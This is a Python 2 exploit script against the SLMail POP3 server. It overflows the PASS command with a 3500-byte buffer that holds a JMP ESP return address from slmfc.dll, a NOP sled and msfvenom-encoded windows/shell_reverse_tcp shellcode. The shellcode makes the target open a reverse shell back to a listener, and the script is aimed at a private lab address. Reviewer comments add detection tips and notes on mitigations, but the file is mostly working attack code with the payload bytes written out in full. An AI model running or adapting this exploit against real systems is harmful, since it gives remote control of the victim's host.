slmail8shellcode.py
#!/usr/bin/python
import socket
# TCP/IPv4 client socket used for the single POP3 session this script opens.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
# Encoded machine-code payload (351 bytes), written as a Python 2 byte string.
# Per the msfvenom command recorded in the comments further down, this is a
# windows/shell_reverse_tcp payload (the affected host connects back to
# LHOST:LPORT), run through the x86/shikata_ga_nai encoder so that it contains
# none of \x00, \x0a, \x0d.
# NOTE(review): the encoder emits different bytes on each run, so these exact
# bytes are a weak indicator. For detection, key on the oversized POP3 PASS
# argument and on the mail service process opening outbound TCP connections.
shellcode = ("\xd9\xf6\xd9\x74\x24\xf4\xba\x43\xf4\xa7\x7d\x58\x2b\xc9\xb1"
"\x52\x31\x50\x17\x83\xc0\x04\x03\x13\xe7\x45\x88\x6f\xef\x08"
"\x73\x8f\xf0\x6c\xfd\x6a\xc1\xac\x99\xff\x72\x1d\xe9\xad\x7e"
"\xd6\xbf\x45\xf4\x9a\x17\x6a\xbd\x11\x4e\x45\x3e\x09\xb2\xc4"
"\xbc\x50\xe7\x26\xfc\x9a\xfa\x27\x39\xc6\xf7\x75\x92\x8c\xaa"
"\x69\x97\xd9\x76\x02\xeb\xcc\xfe\xf7\xbc\xef\x2f\xa6\xb7\xa9"
"\xef\x49\x1b\xc2\xb9\x51\x78\xef\x70\xea\x4a\x9b\x82\x3a\x83"
"\x64\x28\x03\x2b\x97\x30\x44\x8c\x48\x47\xbc\xee\xf5\x50\x7b"
"\x8c\x21\xd4\x9f\x36\xa1\x4e\x7b\xc6\x66\x08\x08\xc4\xc3\x5e"
"\x56\xc9\xd2\xb3\xed\xf5\x5f\x32\x21\x7c\x1b\x11\xe5\x24\xff"
"\x38\xbc\x80\xae\x45\xde\x6a\x0e\xe0\x95\x87\x5b\x99\xf4\xcf"
"\xa8\x90\x06\x10\xa7\xa3\x75\x22\x68\x18\x11\x0e\xe1\x86\xe6"
"\x71\xd8\x7f\x78\x8c\xe3\x7f\x51\x4b\xb7\x2f\xc9\x7a\xb8\xbb"
"\x09\x82\x6d\x6b\x59\x2c\xde\xcc\x09\x8c\x8e\xa4\x43\x03\xf0"
"\xd5\x6c\xc9\x99\x7c\x97\x9a\xaf\x51\xa7\x22\xd8\x53\xc7\xc7"
"\xab\xdd\x21\x8d\xdb\x8b\xfa\x3a\x45\x96\x70\xda\x8a\x0c\xfd"
"\xdc\x01\xa3\x02\x92\xe1\xce\x10\x43\x02\x85\x4a\xc2\x1d\x33"
"\xe2\x88\x8c\xd8\xf2\xc7\xac\x76\xa5\x80\x03\x8f\x23\x3d\x3d"
"\x39\x51\xbc\xdb\x02\xd1\x1b\x18\x8c\xd8\xee\x24\xaa\xca\x36"
"\xa4\xf6\xbe\xe6\xf3\xa0\x68\x41\xaa\x02\xc2\x1b\x01\xcd\x82"
"\xda\x69\xce\xd4\xe2\xa7\xb8\x38\x52\x1e\xfd\x47\x5b\xf6\x09"
"\x30\x81\x66\xf5\xeb\x01\x96\xbc\xb1\x20\x3f\x19\x20\x71\x22"
"\x9a\x9f\xb6\x5b\x19\x15\x47\x98\x01\x5c\x42\xe4\x85\x8d\x3e"
"\x75\x60\xb1\xed\x76\xa1")
# Bad characters excluded from the payload: \x00 \x0a \x0d
# Return address: location of a JMP ESP instruction (opcode bytes FF E4)
# !mona find -s "\xff\xe4" -m slmfc.dll
# 5F4A358F, stored little-endian as \x8F\x35\x4A\x5F
# msfvenom -p windows/shell_reverse_tcp LHOST=10.209.48.120 LPORT=5555 -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
#
# Layout of the PASS argument built below:
#   2606 x 'A'        filler up to the saved return address
#   4 bytes           the slmfc.dll address above, in little-endian order
#   16 x \x90         NOP padding ahead of the payload
#   shellcode         the encoded payload
#   'C' padding       brings the total to 3500 bytes; the 351 is the payload
#                     length and is hard-coded rather than taken from len(shellcode)
# NOTE(review): the hard-coded address only holds if slmfc.dll loads at the same
# base on the target, i.e. presumably the module is not ASLR-relocated. Module
# randomization and DEP are the host-side mitigations this technique depends on
# being absent; confirm against the actual build.
# NOTE(review): a POP3 PASS argument of 3500 bytes containing non-printable bytes
# is far outside any legitimate password, so a length/charset check on PASS at a
# proxy or IDS is a cheap, stable detection for this class of request.
# NOTE(review): the name `buffer` shadows the Python 2 builtin of the same name.
buffer = 'A' * 2606 + "\x8f\x35\x4a\x5f" + "\x90" * 16 + shellcode + "C" * (3500 - 2606 - 4 - 351 - 16)
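# Run one POP3 session against the lab host: read the greeting, send USER,
# read the reply, then send PASS carrying the oversized argument built above.
# Both server replies are read into `data` and discarded without being checked.
# "Done!." therefore only means the bytes were handed to the socket.
# It says nothing about how the server reacted.
try:
    print "\nSending evil buffer..."
    s.connect(('10.209.14.46',110))
    data = s.recv(1024)
    s.send('USER username' +'\r\n')
    data = s.recv(1024)
    s.send('PASS ' + buffer + '\r\n')
    print "\nDone!."
except socket.error:
    # Only network failures are reported here. The original bare `except:`
    # also swallowed KeyboardInterrupt and programming errors, and labelled
    # all of them as a connection failure.
    print "Could not connect to POP3!"
finally:
    # Release the descriptor whether or not the session succeeded.
    s.close()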